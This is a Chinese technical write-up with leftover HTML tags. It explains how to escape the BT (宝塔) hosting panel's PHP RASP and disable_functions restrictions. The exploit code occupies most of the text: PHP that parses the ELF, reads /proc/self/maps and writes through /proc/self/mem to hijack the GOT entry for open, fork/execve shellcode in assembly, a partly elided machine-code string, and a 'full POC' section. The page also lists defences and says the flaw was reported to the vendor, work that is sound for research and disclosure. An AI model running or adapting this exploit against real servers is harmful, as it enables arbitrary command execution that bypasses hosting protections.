宝塔RASP及disable_functions绕过技术分析<\/h3>

一、实验环境<\/strong><\/h4>

宝塔面板配置：

开启防跨站攻击（open_basedir限制）<\/li>
启用堡塔PHP安全防护（RASP）<\/li>
启用堡塔防提权模块<\/li> <\/ul> <\/li>
目标：

突破disable_functions<\/code>限制<\/li>
绕过RASP对www<\/code>权限的命令执行拦截<\/li> <\/ul> <\/li> <\/ol> 二、技术背景<\/strong><\/h4> RASP（运行时应用自我保护）<\/strong>：拦截所有www<\/code>用户的命令执行（如system()<\/code>、su www<\/code>等）。<\/li> 通过底层兼容机制避免PHP崩溃。<\/li> <\/ul> <\/li> disable_functions<\/strong>：宝塔维护了最严格的禁用函数列表，需绕过才能执行任意命令。<\/li> <\/ul> <\/li> <\/ol> 三、绕过disable_functions：GOT表劫持<\/strong><\/h4> 1. GOT\/PLT表原理<\/strong><\/h5> PLT（过程链接表）<\/strong>：保存跳转到GOT的指令。<\/li> GOT（全局偏移表）<\/strong>：存储函数实际地址，动态链接时填充。<\/li> 劫持思路<\/strong>：修改GOT表中目标函数（如open<\/code>）的地址，指向恶意代码。<\/li> <\/ul> 2. 实现步骤<\/strong><\/h5> 解析ELF文件<\/strong>：<\/p> 通过\/proc\/self\/exe<\/code>获取当前PHP进程的ELF信息。<\/li> 提取PLT<\/code>和GOT<\/code>表偏移（关键代码见elf<\/code>类）。<\/li> <\/ul> $test =<\/span> new<\/span> elf<\/span>(); <\/span><\/span>$test-><\/span>get_section<\/span>('\/proc\/self\/exe'<\/span>); <\/span><\/span>$test-><\/span>get_reloc<\/span>(); <\/span><\/span>$open_php =<\/span> $test-><\/span>rel_plts<\/span>['open'<\/span>]; \/\/ 获取open函数的GOT偏移 <\/span><\/span><\/span><\/code><\/pre><\/li> 定位内存布局<\/strong>：<\/p> 读取\/proc\/self\/maps<\/code>获取栈地址和PIE基址。<\/li> <\/ul> $maps =<\/span> file_get_contents<\/span>('\/proc\/self\/maps'<\/span>); <\/span><\/span>preg_match<\/span>('\/(\w+)-(\w+)\s+.+\[stack]\/'<\/span>, $maps, $stack); <\/span><\/span>$pie_base =<\/span> hexdec<\/span>("0x"<\/span>.<\/span>(explode<\/span>('-'<\/span>, $maps)[0<\/span>])); <\/span><\/span><\/code><\/pre><\/li> 修改GOT表<\/strong>：<\/p> 通过\/proc\/self\/mem<\/code>写入恶意地址到GOT表。<\/li> <\/ul> $mem =<\/span> fopen<\/span>('\/proc\/self\/mem'<\/span>, 'wb'<\/span>); <\/span><\/span>fseek<\/span>($mem, $open_php); <\/span><\/span>fwrite<\/span>($mem, $test-><\/span>packlli<\/span>($shellcode_loc)); \/\/ 将open指向shellcode <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 四、绕过RASP：Shellcode注入<\/strong><\/h4> 1. 绕过策略<\/strong><\/h5> 不依赖system<\/code><\/strong>：直接注入Shellcode执行提权操作，避免触发RASP的命令拦截。<\/li> 独立进程<\/strong>：通过fork<\/code>+execve<\/code>创建脱离终端的新进程。<\/li> <\/ul> 2. Shellcode设计<\/strong><\/h5> 关键汇编<\/strong>： push<\/span> 0x39<\/span> ; fork系统调用<\/span> <\/span><\/span>pop<\/span> eax <\/span><\/span>syscall<\/span> <\/span><\/span>test<\/span> eax, eax ; 判断子进程<\/span> <\/span><\/span>jne<\/span> exit <\/span><\/span>mov<\/span> rdi, [filename_ptr] ; 设置execve参数<\/span> <\/span><\/span>mov<\/span> rsi, [argv_ptr] <\/span><\/span>xor<\/span> edx, edx <\/span><\/span>push<\/span> 0x3b<\/span> ; execve系统调用<\/span> <\/span><\/span>pop<\/span> eax <\/span><\/span>syscall<\/span> <\/span><\/span><\/code><\/pre><\/li> 写入内存<\/strong>： $shellcode =<\/span> "<\/span>\x68\x39\x00\x00\x00<\/span>..."<\/span>; \/\/ 编译后的机器码 <\/span><\/span><\/span><\/span>fseek<\/span>($mem, $shellcode_loc); <\/span><\/span>fwrite<\/span>($mem, $shellcode); <\/span><\/span><\/code><\/pre><\/li> <\/ul> 3. 触发执行<\/strong><\/h5> 调用任意文件操作函数（如readfile<\/code>）触发open<\/code>的GOT跳转： readfile<\/span>('dummy'<\/span>, 'r'<\/span>); \/\/ 触发shellcode <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 五、调试技巧<\/strong><\/h4> GDB断点<\/strong>：在Shellcode入口下断点：break *0x[shellcode_loc]<\/code>。<\/li> <\/ul> <\/li> 内存检查<\/strong>：使用\/proc\/self\/maps<\/code>验证内存权限和布局。<\/li> <\/ul> <\/li> <\/ol> 六、防御与修复<\/strong><\/h4> 宝塔修复方案<\/strong>：限制\/proc\/self\/mem<\/code>的写入权限。<\/li> 监控GOT表修改行为。<\/li> <\/ul> <\/li> 通用防御<\/strong>：启用ASLR（地址空间随机化）。<\/li> 禁用不必要的\/proc<\/code>文件访问。<\/li> <\/ul> <\/li> <\/ol> 七、完整POC（关键部分）<\/strong><\/h4> \/\/ 解析ELF获取GOT偏移 <\/span><\/span><\/span><\/span>$test =<\/span> new<\/span> elf<\/span>(); <\/span><\/span>$test-><\/span>get_section<\/span>('\/proc\/self\/exe'<\/span>); <\/span><\/span>$test-><\/span>get_reloc<\/span>(); <\/span><\/span>$open_php =<\/span> $test-><\/span>rel_plts<\/span>['open'<\/span>]; <\/span><\/span> <\/span><\/span>\/\/ 修改GOT表指向shellcode <\/span><\/span><\/span><\/span>$mem =<\/span> fopen<\/span>('\/proc\/self\/mem'<\/span>, 'wb'<\/span>); <\/span><\/span>fseek<\/span>($mem, $open_php); <\/span><\/span>fwrite<\/span>($mem, $test-><\/span>packlli<\/span>($shellcode_loc)); <\/span><\/span> <\/span><\/span>\/\/ 写入Shellcode <\/span><\/span><\/span><\/span>$shellcode =<\/span> "<\/span>\x68\x39\x00<\/span>..."<\/span>; \/\/ 实际机器码 <\/span><\/span><\/span><\/span>fseek<\/span>($mem, $shellcode_loc); <\/span><\/span>fwrite<\/span>($mem, $shellcode); <\/span><\/span> <\/span><\/span>\/\/ 触发执行 <\/span><\/span><\/span><\/span>readfile<\/span>('trigger'<\/span>, 'r'<\/span>); <\/span><\/span><\/code><\/pre> 八、参考资源<\/strong><\/h4> ELF文件格式详解<\/a><\/li> Linux系统调用表（x86_64）<\/li> \/proc\/self\/mem<\/code>利用技术<\/li> <\/ol> 注<\/strong>：本文仅用于技术研究，实际利用已提交宝塔官方修复。<\/p>